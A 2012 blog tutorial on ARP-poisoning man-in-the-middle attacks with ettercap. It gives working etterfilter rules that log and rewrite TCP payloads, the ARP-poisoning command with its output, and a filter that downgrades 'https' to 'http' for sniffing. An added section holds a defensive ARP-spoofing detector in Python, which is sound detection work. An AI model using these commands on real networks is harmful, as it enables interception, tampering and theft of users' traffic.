Man-in-the-middle attack with ettercap: etterfilter
Posted on 2012-8-18 00:58:41
Introduction

ettercap is a powerful spoofing tool for Linux (it runs on Windows too). It lets you build and send forged packets very quickly, at every level from the network adapter up to the application. It can also bind captured data to a local port: a client connects to that port and can decode an unknown protocol or inject data into it (this only works in ARP-based mode).
Below we look at how to inject data.
First you need a filter rule of your own. ettercap ships with a few by default:


    root@Dis9Team:/usr/share/ettercap$ ls
    ettercap.png  etterfilter.cnt        etterfilter.tbl   etter.mime
    etter.dns     etter.filter.examples  etter.finger.mac  etter.services
    etter.fields  etter.filter.kill      etter.finger.os   etter.ssl.crt
    etter.filter  etter.filter.ssh       etterlog.dtd
    brk@Dis9Team:/usr/share/ettercap$

These stock filters do not do what we want during an intrusion, so look at this rule instead:

    root@Dis9Team:~/arp# cat 1
    if (ip.proto == TCP && search(DATA.data, "oo") ) {
       log(DATA.data, "/tmp/mispelled_ettercap.log");
       replace("oo", "xx");
       msg("Correctly substituted and logged.\n");
    }
    root@Dis9Team:~/arp#
Very simple: search every TCP packet for "oo", log the payload, and replace "oo" with "xx".
We compile it and run it:
    root@Dis9Team:~/arp# etterfilter 1 -o 1.ef

    etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    12 protocol tables loaded:
            DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

    11 constants loaded:
            VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

    Parsing source file '1'  done.
    Unfolding the meta-tree  done.
    Converting labels to real offsets  done.
    Writing output to '1.ef'  done.

    -> Script encoded into 8 instructions.


Now run the ARP poisoning with the filter loaded:
    root@Dis9Team:~/arp# ettercap -T -q -M arp:remote -F 1.ef // //

    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    Content filters loaded from 1.ef...
    Listening on eth0... (Ethernet)

      eth0 ->        00:0C:29:84:4C:9D    192.168.40.128     255.255.255.0

    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...

      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services

    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %

    4 hosts added to the hosts list...

    ARP poisoning victims:

    GROUP 1 : ANY (all the hosts in the list)

    GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...

    Text only Interface activated...
    Hit 'h' for inline help

    Correctly substituted and logged.
    Correctly substituted and logged.
    Correctly substituted and logged.
    Correctly substituted and logged.
    Correctly substituted and logged.
    DHCP: [00:0C:29:EB:F8:94] REQUEST 192.168.40.129
    DHCP: [192.168.40.254] ACK : 192.168.40.129 255.255.255.0 GW 192.168.40.2 DNS 192.168.40.2 "localdomain"


Every "oo" in any TCP traffic of the ARP-poisoned machine is now replaced with "xx". I opened GOOGLE.COM, and the result was this (screenshot not available on the page).
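From the defender's side, the tell-tale sign of the attack above is the ARP traffic itself: after poisoning, one host (here the ettercap box at 00:0C:29:84:4C:9D) answers ARP for both the gateway and the victim. The following is an added example, not code from the post or from the ettercap project. It is a minimal passive monitor in the spirit of arpwatch: it remembers the first MAC seen for each IP (optionally seeded with a known static binding), flags any later ARP reply that claims the same IP with a different MAC, and then reports MACs that were caught claiming more than one IP. The ARP replies, the gateway MAC 00:50:56:aa:00:01, and the `ArpReply` record type are all constructed for the example; the victim and attacker MACs are the ones that appear in the ettercap output above.

```python
"""ARP-poisoning detector run over a constructed stream of ARP replies.

Same idea as a passive monitor such as arpwatch: keep an IP -> MAC table,
alert when an IP is re-announced from a different MAC, and single out MACs
that end up claiming several IPs (the gateway and the victim at once is
exactly what ettercap's arp:remote mode produces).
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float          # capture timestamp in seconds (constructed)
    sender_ip: str     # IP the reply claims to own
    sender_mac: str    # MAC the reply says that IP lives at


# Constructed sample: the gateway 192.168.40.2 is legitimately at
# 00:50:56:aa:00:01 (assumed), then 00:0c:29:84:4c:9d starts answering
# for both the gateway's IP and the victim 192.168.40.129.
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.40.2",   "00:50:56:aa:00:01"),
    ArpReply(0.5, "192.168.40.129", "00:0c:29:eb:f8:94"),
    ArpReply(1.0, "192.168.40.2",   "00:50:56:aa:00:01"),
    ArpReply(2.0, "192.168.40.2",   "00:0c:29:84:4c:9d"),  # conflicting claim
    ArpReply(2.1, "192.168.40.129", "00:0c:29:84:4c:9d"),  # same MAC claims the victim
    ArpReply(3.0, "192.168.40.2",   "00:0c:29:84:4c:9d"),
]

# Assumed static binding for the gateway; in practice taken from inventory.
KNOWN_STATIC = {"192.168.40.2": "00:50:56:aa:00:01"}


def detect_arp_poisoning(replies, static_bindings=None):
    """Return a list of (ts, ip, expected_mac, seen_mac) alerts.

    The first MAC seen for an IP (or the static binding) is treated as
    authoritative; it is deliberately never overwritten by a conflicting
    reply, so a sustained poisoning attempt keeps producing alerts.
    """
    bindings = {ip: mac.lower() for ip, mac in (static_bindings or {}).items()}
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = bindings.get(r.sender_ip)
        if known is None:
            bindings[r.sender_ip] = mac
        elif known != mac:
            alerts.append((r.ts, r.sender_ip, known, mac))
    return alerts


def suspect_macs(alerts):
    """MACs that were flagged as claiming more than one distinct IP."""
    ips_by_mac = defaultdict(set)
    for _, ip, _, seen_mac in alerts:
        ips_by_mac[seen_mac].add(ip)
    return {mac for mac, ips in ips_by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    found = detect_arp_poisoning(SAMPLE_REPLIES, KNOWN_STATIC)
    for ts, ip, expected, seen in found:
        print(f"[{ts:5.1f}s] {ip}: expected {expected}, announced from {seen}")
    print("hosts claiming multiple IPs:", sorted(suspect_macs(found)))
```

On a real network this logic would be fed from a packet capture of ARP replies (operation code 2) and would also watch gratuitous ARP; seeding the table with the gateway's true MAC, as `KNOWN_STATIC` does, matters because a monitor that only starts after the poisoning began would otherwise learn the attacker's MAC as the baseline.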


What is this good for? In some situations HTTPS cannot be sniffed by default, so we can do this:
    if (ip.proto == TCP && search(DATA.data, "https") ) {
       log(DATA.data, "/tmp/mispelled_ettercap.log");
       replace("https", "http");
       msg("Correctly substituted and logged.\n");
    }



Well, you can all follow that, right? The rest is up to you. Share: http://fuzzexp.org/tech/viewthread.php?tid=97&extra=


